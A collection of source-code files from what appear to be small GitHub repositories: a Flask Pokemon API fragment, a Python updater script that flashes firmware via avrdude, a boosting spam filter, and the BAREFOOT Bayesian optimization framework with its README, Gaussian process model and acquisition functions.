"__all__=['pokemons']\n\nfrom views.pokemons import pokemons\n" }, { "alpha_fraction": 0.7183708548545837, "alphanum_fraction": 0.7253032922744751, "avg_line_length": 29.36842155456543, "blob_id": "6002f33d85f7acb1b0b6c38db06d7bd0f5d216f2", "content_id": "99d2f9e73ecd0f35b5216ded1890caceb297fc5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1154, "license_type": "no_license", "max_line_length": 352, "num_lines": 38, "path": "/app.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "from flask import Flask, request\nfrom views import pokemons\nfrom data_access import PokemonDataAccess\n# from here: https://www.kaggle.com/rounakbanik/pokemon\nfrom flasgger import APISpec, Schema, Swagger, fields\n# Flasgger(Flask+Swagger) is a Flask extension to extract OpenAPI-Specification from all Flask views registered in your API.\n# Swagger is a simple yet powerful representation of your RESTful API. With the largest ecosystem of API tooling on the planet, thousands of developers are supporting Swagger in almost every modern programming language and deployment environment. With a Swagger-enabled API, you get interactive documentation, client SDK generation and discoverability.\n\napp = Flask(__name__)\n\n# spec = APISpec(\n# title='Entity API',\n# version='1.0.10',\n# openapi_version='2.0'\n# )\n# template = spec.to_flasgger(app)\n# swagger = Swagger(app, template=template)\nswagger = Swagger(app)\n\napp.register_blueprint(pokemons)\n\n\n\n\n\n\[email protected](\"/\", methods = ['GET'])\ndef hello():\n return \"\"\"\n<html>\n <body>\n <h1>Welcome to the Pokemon API!</h2>\n </body>\n</html>\n\"\"\"\n\nif __name__ == '__main__':\n app.run(debug=True)\n" }, { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 25.33333396911621, "blob_id": "976fc4866ccc335bf615ae0c299fa9c6a3ee5b0d", "content_id": "1f126aafe734d91337f25880a4c6455d7c07d25f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 78, "license_type": "no_license", "max_line_length": 53, "num_lines": 3, "path": "/data_access/__init__.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "__all__=['pokemon_dao']\n\nfrom data_access.pokemon_dao import PokemonDataAccess" } ]
7
taida957789/IsraelResearchCooperation
https://github.com/taida957789/IsraelResearchCooperation
9ec4f994515f663e13093f64681afb32011c01cb
42d6648ba8b9fb8fad3cc715afe21ef72c1df243
14d5026a7243c199c1dd9f93b00ac1b257b7bc12
refs/heads/master
2020-09-25T18:45:18.206303
2016-09-11T09:43:09
2016-09-11T09:43:09
67,294,238
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6155340075492859, "alphanum_fraction": 0.6355987191200256, "avg_line_length": 26.446428298950195, "blob_id": "b3b45fdab642f15590c4f4d61858274d858f57b3", "content_id": "41c210f35fc801858c92d14f500d4623292f542a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1545, "license_type": "no_license", "max_line_length": 100, "num_lines": 56, "path": "/AutoUpdate/updater.py", "repo_name": "taida957789/IsraelResearchCooperation", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#-*- coding=utf-8\n\nimport os, os.path, json, hashlib\nimport requests\nimport subprocess\n\n\nURL_UPDATE_VERSION = 'http://192.168.2.5:8080/version.json'\nFILE_UPDATER = 'updater.py'\nFILE_HEX = 'binray.hex'\n\n\ndef md5(fileanme):\n return hashlib.md5(open(fileanme, 'rb').read()).hexdigest()\n\ndef check_md5(filename, hash_file):\n if not os.path.isfile(filename):\n return False\n return md5(filename) == hash_file\n\ndef download(url, filename):\n r = requests.get(url, stream=True)\n chunk_size = 1024\n with open(filename, 'wb') as fd:\n for chunk in r.iter_content(chunk_size):\n fd.write(chunk)\n fd.close()\n\ndef get_remote_version():\n return json.loads(requests.get(URL_UPDATE_VERSION).text)\n\n\ndef update(filename, hash_file, url):\n if check_md5(filename, hash_file):\n print '[INFO] %s version is the newest' % (hash_file)\n else:\n download(url, filename)\n if check_md5(filename, hash_file):\n print '[INFO] Updating %ssuccessfully' % (filename)\n else:\n raise Exception('Updateing %s faild' % (filename))\n\nfields = get_remote_version()\n\ntry:\n update(FILE_UPDATER, fields['md5_updater'], fields['link_updater'])\n update(FILE_HEX, fields['md5_binary'], fields['link_binary'])\n cmd = 'avrdude -c linuxgpio -C /etc/avrdude.conf -p m32u4 -U flash:w:binray.hex -Uflash:w:$1 $2'\n ret_code = subprocess.call(cmd, shell=True)\n if ret_code == 1:\n print 'Success'\n else:\n print 'Failed'\nexcept:\n raise\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.9259259104728699, "alphanum_fraction": 0.9259259104728699, "avg_line_length": 26, "blob_id": "2945cdf7aab4dbe796b81977269dd6a2bce0c0f4", "content_id": "e3cd755a2f5e53a1804d048c7fe59e8c326fe583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/README.md", "repo_name": "taida957789/IsraelResearchCooperation", "src_encoding": "UTF-8", "text": "# IsraelResearchCooperation\nIsraelResearchCooperation\n" } ]
2
chrinide/ensemble-learner
https://github.com/chrinide/ensemble-learner
0084b5c80cd4d7499a63bebac438f6ceaafa07c4
5e7ad4c3183dca8e0346fb0fe18a972bd1ebc50e
9864ced99681c811e46fb9d358bd030ede01b862
refs/heads/master
2021-01-19T22:47:37.125382
2015-06-09T22:20:39
2015-06-09T22:20:39
37,962,248
1
0
null
2015-06-24T04:28:19
2015-06-24T04:28:18
2015-06-09T22:20:39
null
[ { "alpha_fraction": 0.667932391166687, "alphanum_fraction": 0.6800835132598877, "avg_line_length": 26.015384674072266, "blob_id": "096500fea782cc68473a285080c0b357437a9a70", "content_id": "d6ee897c17f191e6bf42a70b6138ecf5e1639f52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5267, "license_type": "no_license", "max_line_length": 110, "num_lines": 195, "path": "/boost.py", "repo_name": "chrinide/ensemble-learner", "src_encoding": "UTF-8", "text": "\"\"\"\nImplementation of a spam filter with boosting algorithms. \n\"\"\"\nimport numpy as np\n\ndef weight_error(true_labels, pred_labels, weights):\n\t'''\n\tReturns weighted error, considers weight vector in calculation. \n\t'''\t\n\tn = true_labels.size\n\terror = 0.0 \n\tfor i in xrange(n):\n\t\tif true_labels[i] != pred_labels[i]:\n\t\t\terror += weights[i]\n\treturn error\n\ndef weak_clf_plus(data,word_index):\n\t'''\n\tReturns vector containing predicted labels of the data.\n\tClassifier predicts 1 if word i appears in data point x, otherwise 0.\n\t'''\n\tpredictions = []\n\tn_sample, n_feat = data.shape\n\tfor i in xrange(n_sample): \n\t\tif data[i][word_index] == 1:\n\t\t\tpredictions.append(1)\n\t\telse:\n\t\t\tpredictions.append(-1)\n\treturn np.array(predictions)\n\ndef weak_clf_minus(data,word_index):\n\t'''\n\tReturns vector containing predicted labels of the data.\n\tClassifier predicts 1 if word i does not appear in data point x, otherwise 0. \n\t'''\n\tpredictions = []\n\tn_sample, n_feat = data.shape\n\tfor i in xrange(n_sample): \n\t\tif data[i][word_index] == 0:\n\t\t\tpredictions.append(1)\n\t\telse:\n\t\t\tpredictions.append(-1)\n\treturn np.array(predictions)\n\ndef weak_clf_xi_plus(x_i, word_index):\n\t'''\n\tReturns single prediction. \n\t'''\n\tif x_i[word_index] == 1:\n\t\treturn 1\n\telse: \n\t\treturn -1\n\ndef weak_clf_xi_minus(x_i, word_index):\n\t'''\n\tReturns single prediction\n\t'''\n\tif x_i[word_index] == 0:\n\t\treturn 1\n\telse: \n\t\treturn -1\n\ndef final_weak_learner(clf_idx, x_i):\n\t'''\n\tReturns single prediction, 1 or -1, for point x_i \n\t'''\n\tif clf_idx > 1530: \n\t\treturn weak_clf_xi_minus(x_i, (clf_idx-1531))\n\telse:\n\t\treturn weak_clf_xi_plus(x_i,clf_idx)\n\ndef boost_algorithm(train_data,labels, vocab, n_rounds):\n\t'''\n\tReturns vector containing the weighted errors and vector containing \n\tpredictions of the weak classifier from t rounds. \n\t'''\n\t\n\t# Instantiate vector containing weight distribution\n\tn = labels.size\n\tvocab_size = vocab.size\n\tweight_vec = np.array([1.0/n]*n)\n\ta_vec = []\n\tclf_indx_vec = []\n\n\tprint \"Number of boosting rounds: %s \" % n_rounds\n\tfor t in xrange(n_rounds):\n\t\t#print \"round %s:\" % (t+1)\n\t\terror_vec = [] \n\n\t\t# get weighted error for all weak clfs\n\t\tfor i in xrange(vocab_size):\n\t\t\terror_vec.append(weight_error(labels, weak_clf_plus(train_data,i),weight_vec))\n\t\tfor j in xrange(vocab_size):\n\t\t\terror_vec.append(weight_error(labels, weak_clf_minus(train_data,j),weight_vec))\n\t\t\n\t\t# pick weak learner\n\t\terror_vec = np.array(error_vec)\n\t\terr = np.amin(error_vec)\n\t\t#print \"error:%s\" %err\n\t\tclf_indx = np.argmin(error_vec)\n\t\t#print \"clfidx: %s\" % clf_indx\n\t\ta_t = 0.5 * np.log((1.0-err)/err) \n\t\t\n\t\t# store for final clf \n\t\tclf_indx_vec.append(clf_indx)\n\t\ta_vec.append(a_t)\n\t\t\n\t\t# reset weight vector\n\t\tfor z in xrange(n):\n\t\t\tweight_vec[z] = weight_vec[z] * np.exp(-1.0 * a_t * labels[z] * final_weak_learner(clf_indx,train_data[z]))\n\t\tweight_vec = weight_vec / np.sum(weight_vec)\n\t\t\n\treturn np.array(a_vec), np.array(clf_indx_vec)\n\n\ndef boost_clf(data, a_vec, clf_indx_vec):\n\t'''\n\tReturn final prediction by calculating weighted majority of classifiers\n\tin all rounds of boosting. \n\t'''\n\tT = a_vec.size\n\tfinal_pred = [] \n\n\tfor x in data:\n\t\tfinal_sum = 0\n\t\tfor t in xrange(T):\n\t\t\tfinal_sum += a_vec[t] * final_weak_learner(clf_indx_vec[t], x)\n\t\tif np.sign(final_sum) == 1:\n\t\t\tfinal_pred.append(1)\n\t\telse: \n\t\t\tfinal_pred.append(-1)\n\treturn np.array(final_pred)\n\ndef get_words(clf_indexes,word_dict):\n\t'''\n\tReturns string of words representing weak classifiers chosen\n\t'''\n\twords = []\n\tn = clf_indexes.size\n\tfor i in xrange(n):\n\t\tif clf_indexes[i] > 1530:\n\t\t\twords.append(word_dict[clf_indexes[i]-1531])\n\t\telse: \n\t\t\twords.append(word_dict[clf_indexes[i]])\n\treturn np.array(words,dtype='string')\n\ndef calc_error(true_labels, pred_labels):\n\t'''\n\tReturns percent error of predicted labels\n\t'''\n\tassert true_labels.size == pred_labels.size\n\tn = true_labels.size\n\n\t# Calculate the error\n\tmis_count = 0.0\n\tfor i in xrange(n):\n\t\tif pred_labels[i] != true_labels[i]:\n\t\t\tmis_count += 1.0\n\treturn (mis_count/n)\n\ndef main():\n\t'''\n\tRuns boosting algorithm on the dataset with designated number of rounds\n\t'''\n\t# Parse input\n\ttrain = np.genfromtxt('data/train_data.txt')\n\ttest = np.genfromtxt('data/test_data.txt')\n\tword_dict = np.genfromtxt('dictionary.txt',dtype = 'string')\n\n\t# Separate data from labels\n\tn_feat = word_dict.size\n\ttrain_data = train[:,:-1]\n\ttrain_labels = train[:,n_feat]\n\ttest_data = test[:,:-1]\n\ttest_labels = test[:,n_feat]\n\n\t# Fit classifier, specify number of rounds of boosting\n\ta_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,10)\n\t#a_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,2)\n\t#a_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,3)\n\t#a_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,7)\n\t#a_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,15)\n\t#a_vec, clf_indexes = boost_algorithm(train_data,train_labels,word_dict,20)\n\t\n\t# Run classification, print error\n\ttrain_err = calc_error(train_labels, boost_clf(train_data, a_vec, clf_indexes))\n\ttest_err = calc_error(test_labels, boost_clf(test_data, a_vec, clf_indexes))\n\n\tprint \"Train Error: \", train_err\n\tprint \"Test Error: \", test_err\n\tprint \"Buzzwords: \"\n\tprint get_words(clf_indexes,word_dict)\n\nif __name__ == '__main__':\n\tmain()" }, { "alpha_fraction": 0.7967032790184021, "alphanum_fraction": 0.7967032790184021, "avg_line_length": 29.33333396911621, "blob_id": "b2bbeeece6f22ba59db33dc98f9159f9cffe78b0", "content_id": "7e2436de05c1da82585c4e1a801dc243fbeb868d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 182, "license_type": "no_license", "max_line_length": 136, "num_lines": 6, "path": "/README.md", "repo_name": "chrinide/ensemble-learner", "src_encoding": "UTF-8", "text": "# ensemble-learner\n\nImplements a spam filter using ensemble learning. The training and test error for a specified number of rounds for boosting is printed. \n\nUSAGE: \npython boost.py\n" } ]
2
jtao/BAREFOOT-Framework
https://github.com/jtao/BAREFOOT-Framework
be9bcfa6c2821154028a1469cb425c2eabb63fd1
93412086a65119c54a2847f5fe2f6a2d00e6cf66
9f3a9570d03a16a89b046a00971e243569494b52
refs/heads/master
2023-03-29T20:07:31.420036
2021-03-29T18:35:49
2021-03-29T18:35:49
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6088184118270874, "alphanum_fraction": 0.6153345108032227, "avg_line_length": 40.8636360168457, "blob_id": "8b46217e1cfb18f92cda0961a53f3f53efa2ef46", "content_id": "6f43051dcf550e9541d9472aca13634c40b5c52c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4604, "license_type": "no_license", "max_line_length": 112, "num_lines": 110, "path": "/gpModel.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 12 12:43:08 2020\n\n@author: richardcouperthwaite\n\"\"\"\n\nfrom george import kernels, GP\nimport numpy as np\nfrom copy import deepcopy\n\nclass gp_model:\n \"\"\"\n A class that creates a GP from a given set of input data and hyper-parameters.\n The Kernel can be selected from three separate Kernels.\n \"\"\"\n def __init__(self, x_train, y_train, l_param, sigma_f, sigma_n, n_dim, kern, mean=0):\n self.x_train = np.array(x_train)\n self.y_train = np.array(y_train)\n self.l_param = np.array(l_param)**2\n self.sigma_f = sigma_f\n self.sigma_n = sigma_n\n self.mean = mean\n self.n_dim = n_dim\n self.kern = kern\n self.kk = self.create_kernel()\n self.gp = self.create_gp()\n \n def create_kernel(self):\n # This function creates the covariance function kernel for the Gaussian Process\n if self.kern == 'SE':\n return self.sigma_f * kernels.ExpSquaredKernel(self.l_param, ndim=self.n_dim)\n elif self.kern == 'M32':\n return self.sigma_f * kernels.Matern32Kernel(self.l_param, ndim=self.n_dim)\n elif self.kern == 'M52':\n return self.sigma_f * kernels.Matern52Kernel(self.l_param, ndim=self.n_dim)\n \n def create_gp(self):\n # This function uses the kernel defined above to compute and train the Gaussian Process model\n gp = GP(kernel=self.kk, mean=self.mean)\n gp.compute(self.x_train, self.sigma_n)\n return gp\n \n def predict_cov(self, x_pred):\n # This function is used to predict the mean and the full covariance \n # matrix for the test points (x_pred)\n mean, sigma = self.gp.predict(self.y_train, x_pred, kernel = self.kk, return_cov=True, return_var=False)\n return mean, sigma\n \n def predict_var(self, x_pred):\n # This function is used to predict the mean and the variance (the diagonal of \n # the full covariance matrix) for the test points (x_pred)\n mean, var = self.gp.predict(self.y_train, x_pred, kernel = self.kk, return_cov=False, return_var=True)\n return mean, var\n \n def update(self, new_x_data, new_y_data, new_y_err, err_per_point):\n # This function is used to update and retrain the GP model when new\n # training data is available\n self.x_train = np.vstack((self.x_train, new_x_data))\n self.y_train = np.append(self.y_train, new_y_data)\n if err_per_point:\n self.sigma_n = np.append(self.sigma_n, new_y_err)\n \n self.gp = self.create_gp()\n \n def sample_posterior(self, x_test):\n # This function provides a random sampling from the Gaussian Process\n # posterior distribution\n return self.gp.sample_conditional(self.y_train, x_test, size=1)\n \n def log_likelihood(self):\n # This function computes the log likelihood of the training data given\n # the hyperparameters\n return self.gp.log_likelihood(self.y_train, quiet=True)\n \n def get_hyper_params(self):\n # This function obtains the hyperparameters from the trained GP and\n # modifies them to be consistent with other Gaussian Process implementations\n curr_params = self.gp.get_parameter_vector()\n params = []\n for i in range(len(curr_params)):\n if i == 0:\n params.append(np.exp(curr_params[i])*self.n_dim)\n else:\n params.append(np.sqrt(np.exp(curr_params[i])))\n return np.array(params)\n \n def hp_optimize(self, meth=\"L-BFGS-B\", update=False):\n # This function can be used ot optimize the GP hyperparameters\n import scipy.optimize as op\n gp = deepcopy(self)\n p0 = gp.gp.get_parameter_vector()\n def nll(p):\n gp.gp.set_parameter_vector(p)\n ll = gp.log_likelihood()\n return -ll if np.isfinite(ll) else 1e25\n \n def grad_nll(p):\n gp.gp.set_parameter_vector(p)\n return -gp.gp.grad_log_likelihood(self.y_train, quiet=True)\n \n results = op.minimize(nll, p0, jac=grad_nll, method=meth)\n if update:\n # automatically update the hyper-parameters, the required input for\n # the set_parameter_vector command is the log of the hyper-parameters\n self.gp.set_parameter_vector(results.x)\n self.gp.compute(self.x_train, self.sigma_n)\n # The results are the log of the hyper-parameters, so return the\n # exponential of the results.\n return np.exp(results.x)" }, { "alpha_fraction": 0.7012426257133484, "alphanum_fraction": 0.7177240252494812, "avg_line_length": 61.69166564941406, "blob_id": "bb4305cca235e4819de49044ce0fff71a8685d8d", "content_id": "cfbb8c9e38e295a3d3bbe743bdd7c2919d1541f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7649, "license_type": "no_license", "max_line_length": 399, "num_lines": 120, "path": "/readme.md", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# Batch Reification/Fusion Optimization (BAREFOOT) Framework\r\n\r\n![Image of BAREFOOT](https://github.com/RichardCouperthwaite/BAREFOOT-Framework/blob/master/BAREFOOT.png)\r\n\r\nThe BAREFOOT Framework class structure allows for two different calculation setups:\r\n\r\n### Single-Node\r\nThis version of the code will run on a single compute node. This compute node could be a single local PC, or a single node on a High Performance Computing Cluster.\r\n\r\n### Multi-Node\r\nThis version of the code is designed to utlize multiple nodes in a High Performance Computing Cluster. The aim is to reduce the time required of the computations. The number of nodes used in this approach is specified by the user and the total number of calculations are split evenly between these nodes.\r\n\r\n\r\n\r\n## Framework Initialization \r\nThe framework is initialized in a two stage process. The first sets up the framework with general information. The parameters that can be edited are:\r\n\r\n* ROMModelList : This is the list of functions that are the cheap information sources. These need to be in a form that ensures that by providing the unit hypercube input, the function will provide the required output\r\n* TruthModel : This is the Truth model, or the function that needs to be optimized.\r\n* calcInitData : This variable controls whether the initial data is calculated for each of the models or is retrieved from a file\r\n* initDataPathorNum : This variable holds the number of initial datapoints to evaluate for each information source (including the Truth Model), or, when initial data is loaded from a file, holds the path to the initial data file\r\n* multiNode : This variable reflects the number of subprocesses that will be used for the calculations. A value of zero indicates all calculations will be completed on the main compute node.\r\n* workingDir : This is the path to the working directory. In some cases it may be desirable to store data separately from the code, this will allow the data to be stored in alternate locations. Can also be used if the relative directory reference is not working correctly.\r\n* calculationName : This is the name for the calculation and will change the results directory name\r\n* nDim : The number of dimensions for the input space that will be used\r\n* restore_calc : This parameter toggles whether the framework data is set up from the information provided or retrieved from a save_state file. This can be used to restart a calculation\r\n* updateROMafterTM : This parameter allows the reduced order models to be retrained after getting more data from the Truth Model. The model function calls do not change, so the training needs to reflect in the same function.\r\n* externalTM : In cases where it is necessary to evaluate the Truth Model separate to the framework (for example, if the Truth Model is an actual experiment), this toggles the output of the predicted points to a separate file for use externally. The framework is shut down after the data is output, see test examples for how to restart the framework after the external Truth Model has been evaluated\r\n* acquisitionFunc : The acquisition function to use to evaluate the next best points for the reduced order models. Currently the options are \"KG\" for Knowledge Gradient and \"EI\" for expected improvement.\r\n* A, b, Aeq, beq: Equality and inequality constraints according to the following equations:\r\n * A*x <= b\r\n * Aeq*x == b\r\n* ub, lb : Upper bounds and lower bounds for inputs, all inputs must receive a value (Specify 0 for lb and 1 for ub if there is no bound for that input)\r\n* func : function constraints, must take the input matrix (x) and output a vector of length equal to the number of samples in the input matrix (x) with boolean values.\r\n* keepSubRunning : Determines whether the subprocesses are left running while calling the Truth Model\r\n* verbose : Determines the logging level for tracking the calculations.\r\n\r\nThe second stage sets up the specific calculation required:\r\n\r\n* modelParam : This is a dictionary of hyperparameters for the low-order model GPs and the discrepancy GPs. See example below for dictionary structure.\r\n* covFunc : Choice of covariance function for building GP models. Choices are currently limited to Squared Exponential (\"SE\"), Matern 3/2 (\"M32\"), and Matern 5/2 (\"M52\").\r\n* iterLimit : This determines the total number of iterations that the calculation will run for.\r\n* sampleCount : The number of test samples to use. Samples are selected by Latin Hypercube Sampling.\r\n* hpCount : The number of hyperparameter sets to use.\r\n* batchSize : The batch size for the evaluations of the real functions. This affects both the number of reduced order evaluations and the number of Truth Function evaluations.\r\n* tmIter : The iteration limit before calling the Truth Function.\r\n* totalBudget : The total budget (calculation time) that can be expended before the framework is terminated.\r\n* tmBudget : The amount of budget that needs to be used before the Truth Function is evaluated.\r\n* upperBound : The upper bound of the hyperparameters (usually setting to 1 is sufficient since inputs are on a unit hypercube).\r\n* lowBound : The lower bound of the hypeparameter values.\r\n* fusedPoints : The number of points per dimension to use when constructing the Fused GP. Points for evaluating the Fused GP are sampled linearly for each dimension, creating a grid of points to evaluate the fused mean and variance.\r\n\r\nThe code below is included in the \"barefoot.py\" file as a test, and provides the minimum input required for running the BAREFOOT Framework.\r\n\r\n```\r\nimport matplotlib.pyplot as plt\r\nfrom barefoot import barefoot\r\nimport numpy as np\r\n\r\ndef rom1(x):\r\n x = x*(2)+0.5\r\n return -np.sin(9.5*np.pi*x) / (2*x)\r\n\r\ndef rom2(x):\r\n x = x*(2)+0.5\r\n return -(x-1)**4\r\n\r\ndef tm(x):\r\n x = x*(2)+0.5\r\n # Gramacy & Lee Test Function\r\n return -(x-1)**4 - np.sin(10*np.pi*x) / (2*x)\r\n\r\ndef plot_results(calcName):\r\n x = np.linspace(0,1,1000)\r\n\r\n y1 = tm(x)\r\n y2 = rom1(x)\r\n y3 = rom2(x)\r\n \r\n plt.figure()\r\n plt.plot(x,y1,label=\"TM\")\r\n plt.plot(x,y2,label=\"ROM1\")\r\n plt.plot(x,y3,label=\"ROM2\")\r\n plt.legend()\r\n\r\n with open('./results/{}/iterationData'.format(calcName), 'rb') as f:\r\n iterationData = load(f)\r\n \r\n plt.figure()\r\n plt.plot(iterationData.loc[:,\"Iteration\"], iterationData.loc[:,\"Max Found\"])\r\n\r\ndef singeNodeTest():\r\n np.random.seed(100)\r\n ROMList = [rom1, rom2]\r\n test = barefoot(ROMModelList=ROMList, TruthModel=tm, \r\n calcInitData=True, initDataPathorNum=[1,1,1,1], nDim=1, \r\n calculationName=\"SingleNodeTest\", acquisitionFunc=\"EI\")\r\n modelParam = {'model_l':[[0.1],[0.1]], \r\n 'model_sf':[1,1,1], \r\n 'model_sn':[0.01,0.01], \r\n 'means':[0,0], \r\n 'std':[1,1], \r\n 'err_l':[[0.1],[0.1]], \r\n 'err_sf':[1,1,1], \r\n 'err_sn':[0.01,0.01],\r\n 'costs':[1,2,20]}\r\n test.initialize_parameters(modelParam=modelParam, iterLimit=30, \r\n sampleCount=10, hpCount=50, \r\n batchSize=2, tmIter=5)\r\n test.run_optimization()\r\n \r\n plot_results(\"SingleNodeTest\")\r\n\r\nif __name__ == \"__main__\":\r\n singeNodeTest()\r\n```\r\n\r\nFor more information on the methods used in this framework, please see our publications:\r\n\r\n1. Couperthwaite, Richard, Abhilash Molkeri, Danial Khatamsaz, Ankit Srivastava, Douglas Allaire, and Raymundo Arroyave. “Materials Design Through Batch Bayesian Optimization with Multisource Information Fusion.” JOM, October 13, 2020. https://doi.org/10.1007/s11837-020-04396-x.\r\n\r\n" }, { "alpha_fraction": 0.5865907669067383, "alphanum_fraction": 0.6030360460281372, "avg_line_length": 31.26938819885254, "blob_id": "e3e4130d19f69a2e2628145d0e271aacd6442486", "content_id": "36ede333f57e9a1b6b959c59817b09f713513337", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7923, "license_type": "no_license", "max_line_length": 99, "num_lines": 245, "path": "/acquisitionFunc.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 12 13:51:02 2020\n\n@author: richardcouperthwaite\n\"\"\"\n\nimport numpy as np\nfrom scipy.stats import norm\nfrom scipy import random\n\ndef knowledge_gradient(M, sn, mu, sigma):\n \"\"\"\n This is the method used to determine the knowledge gradient of the fused model\n for a given set of test data points. The aim is to calculate the best possible\n point to be used in the next iteration. This function will be called after the\n fused model is calculated for each of the lower order models being assumed to\n be the truth model.\n \n Implementation based on the work by Frazier, Powell, Dayanik\n [1]P. Frazier, W. Powell, and S. Dayanik, “The Knowledge-Gradient Policy for \n Correlated Normal Beliefs,” INFORMS Journal on Computing, vol. 21, no. 4, pp. \n 599–613, May 2009.\n \n M: the number of samples\n sn: the noise of the model\n mu: mean of the model for all M samples\n sigma: covariance matrix of the model\n \n The function returns:\n NU: Knowledge Gradient values for all the samples\n nu_star: the maximum knowledge gradient value\n x_star: the index of the value with the maximum knowledge gradient (0 as first index)\n \"\"\"\n from scipy.stats import norm\n \n def algorithm1(a, b, M):\n c = [np.inf]\n A = [0]\n for i in range(M-1):\n c.append(np.inf)\n t = 0\n while t == 0:\n j = A[-1]\n c[j] = (a[j]-a[i+1])/(b[i+1]-b[j])\n if (len(A)!=1) and (c[j]<=c[A[-2]]):\n A = A[0:-1] \n else:\n t = 1\n A.append(i+1)\n c = np.array(c)\n A = np.array(A)\n return c, A\n \n NU = []\n \n for i in range(M): \n a = mu\n try:\n b = sigma[:,i]/np.sqrt(sn**2+sigma[i,i])\n except IndexError:\n b = sigma/np.sqrt(sn**2+sigma[i])\n \n I = np.argsort(b)\n a = a[I]\n b = b[I]\n bb, indexes, inverse = np.unique(b, return_index=True, return_inverse=True)\n aa = []\n for ii in range(len(indexes)):\n aa.append(np.max(a[np.where(b == b[indexes[ii]])]))\n \n MM = len(aa)\n aa = np.array(aa)\n c, A = algorithm1(aa, bb, MM)\n aa = aa[A]\n bb = bb[A]\n c = c[A]\n MM = A.shape[0]\n sig = 0\n for ii in range(MM-1):\n sig += (bb[ii+1]-bb[ii])*(norm.pdf(-abs(c[ii]))+ (-abs(c[ii])) * norm.cdf(-abs(c[ii])))\n nu = np.log(sig)\n NU.append(nu)\n \n try:\n if nu>nu_star:\n nu_star = nu\n x_star = i\n except NameError:\n nu_star = nu\n x_star = i\n \n return nu_star, x_star, NU\n\ndef expected_improvement(curr_max, xi, y, std):\n \"\"\"\n This function calculates the maximum expected improvement for a selection of\n test points from the surrogate model of an objective function with a mean and variance.\n \n J. Mockus, V. Tiesis, and A. Zilinskas. Toward Global Optimization, volume 2,\n chapter The Application of Bayesian Methods for Seeking the Extremum, pages\n 117{128. Elsevier, 1978.\n \n Parameters\n ----------\n curr_max : float\n This value is the best value of the objective function that hase been obtained.\n xi : float\n This parameter defines how much the algorithm exploits, or explores.\n y : 1D vector Numpy Array\n The mean of the surrogate model at all test points used in the optimization.\n std : 1D vector Numpy Array\n The standard deviation from the surrogate model at all test points \n used in the optimization.\n\n Returns\n -------\n max_val : float\n The maximum expected improvement value.\n x_star : integer\n The index of the test point with the maximum expected improvement value.\n EI : TYPE\n Expected improvement values for all test points.\n\n \"\"\"\n \n pdf = norm.pdf(y)\n cdf = norm.cdf(y)\n\n EI = (y-curr_max-xi)*pdf + std*cdf\n \n max_val = np.max(EI)\n x_star = np.where(EI == max_val)[0]\n \n return max_val, x_star[0], EI\n\ndef probability_improvement(curr_max, xi, y, std):\n \"\"\"\n This function calculates the maximum probability improvement for a selection of\n test points from the surrogate model of an objective function with a mean and variance.\n \n Kushner, H. J. “A New Method of Locating the Maximum Point of an Arbitrary \n Multipeak Curve in the Presence of Noise.” Journal of Basic Engineering 86, \n no. 1 (March 1, 1964): 97–106. https://doi.org/10.1115/1.3653121.\n \n Parameters\n ----------\n curr_max : float\n This value is the best value of the objective function that hase been obtained.\n xi : float\n This parameter defines how much the algorithm exploits, or explores.\n y : 1D vector Numpy Array\n The mean of the surrogate model at all test points used in the optimization.\n std : 1D vector Numpy Array\n The standard deviation from the surrogate model at all test points \n used in the optimization.\n\n Returns\n -------\n max_val : float\n The maximum probability of improvement value.\n x_star : integer\n The index of the test point with the maximum probability of improvement value.\n PI : TYPE\n Probability of improvement values for all test points.\n\n \"\"\"\n \n PI = norm.cdf((y-curr_max-xi)/std)\n max_val = np.max(PI)\n x_star = np.where(PI == max_val)[0]\n \n return max_val, x_star[0], PI\n\ndef upper_conf_bound(kt, y, std):\n \"\"\"\n This function calculates the Upper Confidence Bound for a selection of\n test points from the surrogate model of an objective function with a mean and variance.\n \n D. D. Cox and S. John. SDO: A statistical method for global optimization. In\n M. N. Alexandrov and M. Y. Hussaini, editors, Multidisciplinary Design Opti-\n mization: State of the Art, pages 315{329. SIAM, 1997.\n \n Parameters\n ----------\n curr_max : float\n This value is the best value of the objective function that hase been obtained.\n kt : float\n This parameter is a combined parameter for the sqrt(beta*nu).\n y : 1D vector Numpy Array\n The mean of the surrogate model at all test points used in the optimization.\n std : 1D vector Numpy Array\n The standard deviation from the surrogate model at all test points \n used in the optimization.\n\n Returns\n -------\n max_val : float\n The maximum upper confidence bound value.\n x_star : integer\n The index of the test point with the maximum upper confidence bound value.\n UCB : TYPE\n Upper confidence bound values for all test points.\n\n \"\"\"\n \n UCB = y+kt*std\n max_val = np.max(UCB)\n x_star = np.where(UCB == max_val)[0]\n \n return max_val, x_star[0], 